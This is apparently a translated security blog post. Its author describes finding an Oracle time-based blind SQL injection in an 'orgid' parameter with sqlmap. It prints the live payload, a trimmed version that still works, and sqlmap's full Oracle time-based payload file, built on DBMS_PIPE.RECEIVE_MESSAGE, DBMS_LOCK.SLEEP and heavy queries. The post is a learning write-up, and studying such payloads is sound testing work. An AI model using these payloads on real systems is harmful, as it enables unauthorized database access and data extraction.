Screenshot of the Oracle time-based blind injection found by sqlmap
The payload is:
abz345Name=************&orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&abb017q=20220122&cxfw=1&abb017z=&bae204=0&pxfs=1&source=3&access_token=null&limit=12&_queryid=new
It reports the injection point as the orgid parameter, submitted via POST.
Since this was my first time dealing with Oracle time-based blind injection, I didn't quite understand the payload after orgid=400, so I looked it up on Baidu and found that Oracle time-based blind injection relies mainly on a few functions.
DBMS_PIPE.RECEIVE_MESSAGE is one of them (RECEIVE_MESSAGE function - receive a message from the specified pipe - IBM documentation).
When testing manually, if the page responds with the specified delay, it can be judged to be time-based injection.
Later, after repeated testing, I trimmed the payload down to the minimum that still did not affect the judgement, to make debugging easier, and found that it could also be submitted via GET, as follows:
orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12
Test screenshot:
I also asked another experienced colleague and learned that time-based blind injection is in fact a form of boolean-based injection: it judges by true or false, and a delay of the specified duration indicates injection. To pull out the current user name or current database name, one can only try character by character, with 128 attempts per character; sqlmap does this by batch brute-forcing, and the same can be done with Burp Suite.
The Oracle time-based blind injection payloads from sqlmap are extracted below (under sqlmap directory\data\xml\payloads):

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <!-- Time-based boolean tests -->
    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
    <test>
        <title>Oracle AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
        <request>
            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
        <request>
            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>
    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>
References:
Time-based blind injection - heibaikong6's blog - CSDN Blog
How to customise payloads, as seen from the sqlmap source code - Anquanke (安全客), security information platform